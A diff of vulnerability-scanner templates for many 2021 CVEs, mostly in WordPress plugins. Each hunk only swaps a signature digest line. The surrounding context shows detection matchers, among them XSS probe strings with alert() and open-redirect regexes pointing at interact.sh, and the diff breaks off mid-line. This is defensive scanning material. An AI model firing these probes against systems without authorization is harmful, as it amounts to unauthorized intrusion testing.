b/http/cves/2021/CVE-2021-24926.yaml index 415f6cb82b..54785c7b69 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b14f69b3f7724fc8837a995727a7fff919c6e178eb364024206ea3954902c9f6022009a5bb9ef69c8f6bcab91dda9910b89cedda7e3fe7c93df1284e91f48989cd2c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207aebb367b7a486a5e74cb569b877f038ce4c50de42cbec9f197a86e4a310723502205bffda1bcfc3332d6e51cdc4afc4d0892716f8061855181d412413bcf6365eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 0b3e60c53f..adaba53bfb 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -43,5 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{\"status\":true")' condition: and - -# digest: 4b0a00483046022100ce9ade798c47974686d6d32b10473203825d075e1d588b40dadcf8c989f5187f022100aea3aed16b192728d4c31c4be3bcf69c11fc21bcbb7102daf44030d957b36bee:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b625f3853f4a7f2dc306ae4817162d8ab25ea016511e7daad93c38414ec08c60022100ee88ae35895a3dca4d533f0a28f3e2a2a13b6bb1d6c7d4b94a54c2154ed8bb9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 4b63ca8eae..58b135ef3b 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -48,5 +48,4 @@ http: - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') condition: and - -# digest: 490a0046304402200123bdb18896f7cb6ef08dbce2804df85097d21572bee86e9e6f1100c9aefa330220083670a3911fb6caecffcd9b70f1f4607bd12930b6b374f7f60bbb0e4ab1ad30:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c8700418443b9e786f529b53b5ffe5fa00c0f8715167b1a1c2e6711eacd232200220035ee66f5d4eb8805851a4959236d04445155956d6486b79f2be4ceac3b8d05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 7b78ddc4ac..46f4afd648 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -44,5 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and - -# digest: 4a0a00473045022100e009a9bb773f0ce7f19885c4a406b37042a918fa089f4ef75ab512b30b96c32a022035a4eb03f97ac0e2ed1538fb1cc492c4cb4e5b20a21200e551b906f6ca5a95f1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100888bbc29d7e4a28170e34fcda262b2021bd31236dd3755a02f1bb5773392f29c0220054f2708067b73e49e278a5516d50f8ec573bddb19928c133620fcaf2f8192d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 959a9353ea..74dc7eb4eb 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022000ab458abc0d3b92ad90cff8d4b860f057025f7e0555c4ca4132618bdac2fd21022100c9fab65ac4a437f422a1b0ca3f866d9ffc1c6e694214711efb008ec2fdc39d69:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008afe2faa82050fa38d86cf53d175227c18cf96d362a50a07eff3484113791245022055f33b45ace582d11e1db57796268899e74c4bf2936df7dcc29195e582d4fd79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 3d758fa9b5..f771fde351 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220257fb3376a2c13332d50b9827d873a2c56974cf9ac4dc774bda011cf08c51b7902201e69612cc756571fbaf3ee571bbab890987bbb4e08c5a2563fa31fab61cdc633:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022030135d1ecfadb4f378a14178b55bfee3c3bb25a4de2f324462e281ad82792af30220378f58ac39a9547f987030d59752f9b69f44278e887d7cdd7a43d143b48a29fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index f52d9a730f..9e77378769 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -49,5 +49,4 @@ http: - 'contains(body_2, "Hello world!")' - 'contains(body_2, "Welcome to WordPress")' condition: and - -# digest: 4a0a0047304502205dc21f5ddbd3e009481f909ca47f01b6fdcee48eaa867e030ac223ef00b8a564022100dd1926e52cbfb198a543f65abdf43f06ad728f3aebcc0e2176c6d777d5c61326:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203dc052d900338d42d08c05644027aea81bbcd3f74108e81a9838cae6d578eba502204720f072ea3f697bc418a2a7fb9dc580fbfa9d0536f9b9ede7f78e0361aebc64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 24b5d15a60..3d515d5a2a 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -49,5 +49,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and - -# digest: 490a0046304402204bbefabeb298e1cbaad8ff9f1349fe25a45e31f843ced3798d0fbc3d511dbe8102207ccccf7316b078c7448209a53ac991ffe71d24c5eacd51dce36c7d72a6eab6e0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ed962872d7984b7a2d31aefe97c3f3f14bc90ce2858286f15fab46a918dd955302210098276936cfc4cef083825c94586e729b6e061d40ee56a51ce316006d06de71e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 3efb49ccbb..c4bc4ffa68 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008d81c1c07faa605e3def24c8167588961474c3c7b67334d75e047515ba19029002204eb62b5c24d58f04c5a66cffd43a1febc73f1ea427fd4bc85fa7bb45d6119a26:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100abef5a24c9d5146d1223fffeefe6f256e406f1bc910193ce6cd120266a6c1e08022100c65ad81fc48be561485bbce350c65ad76b691fd87744c23d62601fbad82ba43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 3c9f1840dc..42ab1c04f4 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210098cb237cb7ee8de35c239a63dd5502b8e848b827125ff4a163918f8d82abb7550220134470e5b3698bf105ac52fc2644ba4e5adc5292fff6c566f80371fb1485468a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022079daf2abdd2e18fc2fa6eae32bd2c8c82414eb05eca441a1342fc9671af26c36022100b2aa58ab9097f79883fb4b9b682de4e92e242a4301505d0e7647d612f0bab49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index b0c95d16e3..d4fb7d1b6b 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204724b150f9d95b5cfbd534c761b4db7047dd6d9b245b1674d4f39c13e958f2d2022100bafcbcec88601c8197b11421eaab368a65c9b2dfb75342395fb31098f43bd27e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009c1135104b4ad83a5a17362badc554517bd8ae46a42800271024bd9593a38100022052a5d2ecca88b961d964a83c8b639c5c277de51f353ea1c8b058661bed71a001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index d06e032844..34040d9ffc 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -55,5 +55,4 @@ http: - contains(body_3, md5(num)) - contains(body_3, 'PNG') condition: and - -# digest: 4b0a00483046022100a4970900c4ec86735078fa6be779d0f199f6e2cc9f9eacfc455feb94867266f2022100e86bddb63c5cca630f070dc7765cb0fbf5924a26808377604bab587c147655db:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202a2cd8821efed631f95c97c974a6d70ca5340c4957c8ada169a7d244eb6c9cf9022100990aa9641572e15a4d1642a64a41ada4fb9381cd87b03c00cff52af36a3dc6c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index ebc1e0bc83..018b24f371 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022024973f7df031c32fcd1c14aaf375f085f10718eceb1ee959637aabbd592e420f022032527df8abdd503f09c9e5fe45755896966af38f561be7a813031ff7fe268c9d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022002ad722b1fa5fb44f0e6bc1bb941478b90f34bf7a463c21e67435d898a44ca47022100ec3bbac700391610d976d9b1e89ffd1ecd08cd9ec27793a22ccd10d6d050a3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 76125af8b9..49639543dd 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cca6780872a17f22078b0327aa78226499823d8bd891faa4924cd27012bdbdcb02207a76d1cae982f719d6c2e1fd5a91180176b67e6f5bedd6ba8699081982c6ca51:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204e82f58ee8df94238974bebd84cb23701fb91cc8d4fefee7477b0ddd24d414f6022100ac5808da81a8898e86d072d54b62dbf1c11000e676b2103e3ea4a767f27dbe57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index 1c5a51b90f..06e9339d14 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100c8244d8b050d7d03009721ccc372a6057244a870d0946544d4296e40ab9140e6022100df5d24b48cefb14ea15e0f65e402c7a291464add8dedfbc1fd6230df3b9a60ad:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203caebe5df725a73973f90612435fce054b4766f6005e13f45962c4c82725eb69022008c669779f85f776d84c4766c01e6099d37254cbdbdfcb6729d08ed55e5147ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index ee78d2ff0b..8f6f08d646 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a0048304602210086b0b84548a12d5080004218a9d4187dcc2541eefbd5f8ca608d6cb642a29464022100af9a7a28caaed7093c76d2d92e0435ac908cecc649161e322ad9f2f9dba84d3b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220781570c79fdba51bcfb39d4b11b1aa18aa01e43ebee110e889841ebe5f939af3022100d62a2bb177bda92eeedf2c2b3700216e7aea1f46497ac60b6d57e0a843a282a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 0938aecbf5..14614d472b 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100efd00e524e197a6a4cc981008d49c17028eb8a5e569216fc8a6edb075ac76b010221009b4a3743a86b2126ee324c633fcfaa91bc1648bdf075eb184197ec91c896653f:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220546c165748ebc61d9e1842319a9ef0ad5b11055987cc71c4460fcf215abf7d17022042c7221acf443b83c2e262c798f6c5a4d54e998340bdc28322f8169bf623565e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 911a160298..f7a12b091e 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a7a96845bec81a9a03808603f6d1c2326ec56c2c96104fc416ecea724729ee6f0221009baa3f87262e84f19f479fc820829260ff9c351a955fe1e231a387e0f0c305c1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009075c7cc92866622694ba466630e4f71804accbc44516836c1a36d47afbe9a97022100a45eecea2d952d80ee17a19c707b750dbf53efb2be1659628d4c9ff61e6397f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 2872c75db0..77907c2ca4 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d7ecdfea22abf882b0f6fa0606fc6237340e7f5c1d6bdb3b348d2ec4faefb53c02204e89284eccc46f4f039e561e02205621eceaacce7c0b8e59aee2c0b74b194eb3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a70729980312b8d44830b5693ab66c26d82702584305a4a9adf943532f1e2c45022071627ae8cc7fe118f664b8c456902870fd0da5931295da32739f78a3d0f52f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 8ea3d512d1..82d783dc4a 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -47,5 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and - -# digest: 490a0046304402201030eff632bee5fc2c78887c90a77eb5b455e6547b1dc93b18f5a25f42b7f8df02202f369d5420b158732cc800a093bfa9c2901de23d67a6d52270b015019311e8ac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e871b3d6c70e31428b9dbf3b2054c5f2af7261a5d0cd4bcfd4490b33205277a022100963635845e5c548bca9668484039b5ec69193b45eeac9a4cf6c4a42c651d0986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 1f96d1bb4d..6b1a7e3e84 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' - 'contains(body_2, "Enter Page Title")' condition: and - -# digest: 490a00463044022020cc98a5ad6aa4d9599b57146ad3ed2e38065a39c0d7875525ab5be6f65e0f0102200b567fcca9031a0e887a277b9d679c6f67184961b784adb05b7155fe629f412a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220636135b9ce81f18fd6c8b7c8d1fba89cfbde50e6afb85dec767032dc41ea79ea02204b24a1892a11216b1553c9193607cdf1e6baf88f79f5580684ba44afb173a3dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 995b9cdfe5..9d66e66dfb 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022100bbefb3f3cf79761a5562db66065a1949c233118fb68afb89affc12cc9bf6bc09022042c2f396aedf5d303240555629a8f9e63a56f277397350973dfa7b91213fb04e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100af648bc7798e76d95745c896bad487a9bd0b725762fa6b32ee1bc4d632cd63d70221008ed45ffedb77f56d86bc4df8a22b154a0701f9afadc3bc96a66d9f7abd6870c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 985f7e8675..153ce8ede8 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202f896e8bdc16db67eb6fcd1680cd21d781bbfffca1c978afb2deab786943ea330220048cbce409a3d38a4d4da92bdab4cd6af7af094914900eeec9bb440f8462ba76:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022078c17c1c4063d7005f4ec6b67f6a21dbf8f63f54d73f61d59742bda8e73fb0a602205e1d3ae563fda40cc18aa66bd7f7b92c55d0e2e9e0a010040a06d0a3d17b395a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 0db7faf8f6..7e4862d3e3 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and - -# digest: 490a0046304402201415777cd04ca7ec42a8a17ffaf6f7ff6d357f3d3728b81d5edadea172d6078e0220406d5a0b01b690a5422a7a17cba5ee3d7baff92e8aea64f08299ed328549b41c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eba590cb254e0b663021359dc8be8fdecc1528fc346c1530f940692dad46bcfe022100b352c704c4895b0c2cce81bac7b8f01b9929331a0aa7b6ef3a85e0e319ed12e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index e49d3ab264..4c8ee5ef0e 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -49,5 +49,4 @@ http: - 'contains(header_2, "text/html")' - "contains(body_2, '') && contains(body_2, 'contact-form')" condition: and - -# digest: 490a00463044022015069d18ef3e15d225b9d3ffc4e9bd0e533cd7e27ea8f034a055db2d69b51b2f022054978de3373c9451c0dfbfb7036f807e33f7467ae385de2f81709acb2d09895d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207dd88bd14cc608b4998e475edd04c68db607774844759ff0d1169f3efc4d940b022100fe786873ed28c118eccc1470e45484ee8803d585eeb169c9d50dd17e42211c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 4bc1db8fa1..1bd335730a 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009faba53e588774ab5f91bd5e5301469dc7c04dad4ed6cccd685f84bb2a3a58f1022100d9f0f4869b80734157471f0089e596dd6cf53edf49e66c0e4ab36d931f06b972:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220129e47561140401acc43233d0cc9c2fd35e482e9356cade064a971a53382f2bc022100adc7ba47796deb9873980ceacb893e904fddae295606c3835a38a1544dd59dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 9f48390898..75bfa5bf41 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -46,5 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and - -# digest: 490a0046304402206100ac495d349092f43a55325d0e9f010bd94bd443c0ceef8072e9a1c265bc790220704e59f1cf0b6d8b7998bfbf1a4dcfc30dda57d9b03b3ecb5fcd7de046e92666:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022022aa6f61e9ad398610b319c14e3b6a2d0d06617c4d103c11a74a9199cf9cb19702210087f600b8f589671a5a269394b304ee522969175c9560578856215818bb3451f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 8443089f50..b9d8efbd6d 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207bad9a1e13e178cf6d04cd85c49159c32719aac93783828335c33e90e9aa4043022100931b6d65ca5f4c0f87ec61e6ebde36d7104a1ad41f2db83dc0259baa9ef6e384:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220794d953720f6e15f63f5906b95383b50e6d2017c738d722c4c001812f1e64f4d0221008098921fbcf830a3fe17424d832dc1717c823a74aa22b7bbc2c702e15d9cc652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index c07bcc1b76..b0fdd494d7 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a0047304502204aa79311906506dc21509095e3aef9b9eac07e9d843d361bee0bd1959a8c6b08022100dd31e3bf63f2ef78f138e1175f2234a2f7291ba2c56513e75a0313cf90a685d9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206c979d81ff13f85433a0f332008233e6f0c496f704f78eea41c5fcfe54aa81db02206b71fd73a1484867b4a8cc2d6accd2503536dd6ff9c49b8e894cb01c8cef2f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 0edbe23f71..9bc4d7f052 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220541f9493661d79e84cd9f9a94c511f1a24400b22a62798230a0bba882b6349f90220530b1b0eeccd5eba6fae0dc1cbc48f8e7ba47ea84119d2638834b26805a71e23:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bae506252f5f03324d9a09e3c32df7161feea27646898a9254660e42230cbc3a022100d1b7ecdb1f572e5fd5e6716b2a0fc355869efe8c41601573529e3b8f2a7eeef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 9a0b08b473..0f4d049cc8 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -48,5 +48,4 @@ http: - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and - -# digest: 4a0a004730450221008b397ffa2eb23d6f208b0880a99a69b679b8433efacc118abd02cfc451484b24022037cef0e0df48eb98a2f37f3fb4393219a9010d4bbc978ca2abcd85472afed141:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203cd01e2c2457b259df698269fc390975c372a2953eac301b270af4221c5f12380220114ef41b988493ea8d0023c0d7ef09af506a0bd5d84eaeeb736979249efd86a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 85e833cf2a..02e657d177 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -51,5 +51,4 @@ http: regex: - '"path":"(.*)/wp-content\\(.*)","size' part: body - -# digest: 4a0a004730450220203c442309386cc1ff0f8396d78ebd32f721a1d31f4788b26a2419b32fdf9fb8022100f8f3402c5854435fdbfbc9a43b35888ce5d6d627e063df40d595b8b8b3141d58:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204460e4cc93d67872125014bbcdb1988892b8b7b128c50a4cbfacd485008976700220106c4b7f5c0bb3fa1c00a1af8e0a92c1d7946260217249333866e78fc46f5045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 520bf532b8..4c422a8ab8 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220509d4e59ce2494cdd9c9afc690d695b93b64a1cabb1ba8cab3c74dc62b11c23a0220425b40c5a17061330bd3f8b5ba397638f2de777c733f4928fd721d111abfe8e7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022058548674fc0d2c113eb6c93e97a38255ec6d3f8f5db6fe73a524f837d1d59e17022100fe674cf4765bafa4b7bdacbdd8f1156492449a09a1c8d6f7cd867a35b6036ac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index a1d0923e2b..8d681997b6 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201b7a5a20d4b6028efdf98d7a9db29103d5c7139caaec4fce4a865afffa5713a3022100dcfdb35d04a8ef0dda5cd690324c5eb2a28af52efb853b26236cbe7d38ad9570:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b61b142ba2c46e5b14423f3fb143e281b1d809d59aa3601253c13c01f1e0888502210096cc0ea27aec4270efec9d461417f1f0a08833debd5d35389a67fc53d7b6303c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 23fb7f1947..c4202dff53 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -85,5 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body - -# digest: 4a0a00473045022100d5f5db7f6c19d6ecf29833697450367ef5df40baf5477a78a10a16878f9704c30220463d1b5415b3ddb3d62b66f2e7b2b481fd3f6748556688fc17203e0a2d38960f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c05f8715af3fa26b524b236ab387a407b34f60107827524c00cccd33ef0e37900221008d256bb60b36e23c7049693d889d204f58b70ff9dfe0c5bfe1bd694a7b063a33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index a1e8730352..cb6af83d41 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -85,5 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body - -# digest: 